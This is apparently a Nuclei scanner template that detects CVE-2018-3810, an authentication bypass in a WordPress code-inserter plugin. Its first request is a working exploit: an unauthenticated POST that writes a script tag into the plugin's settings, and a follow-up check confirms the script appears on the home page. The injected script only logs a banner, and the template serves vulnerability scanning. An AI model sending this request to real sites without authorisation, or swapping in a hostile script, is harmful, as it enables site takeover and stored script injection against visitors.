id: CVE-2018-3810

info:
  name: WordPress Smart Google Code Inserter Authentication Bypass
  author: princechaddha
  severity: critical
  reference: https://www.exploit-db.com/exploits/43420
  tags: wordpress,cve,cve2018

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"

    body: 'sgcgoogleanalytic=<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
    headers:
      Content-Type: application/x-www-form-urlencoded

  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "text/html"
        part: header

      - type: word
        words:
          - '<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>'
        part: body

      - type: status
        status:
          - 200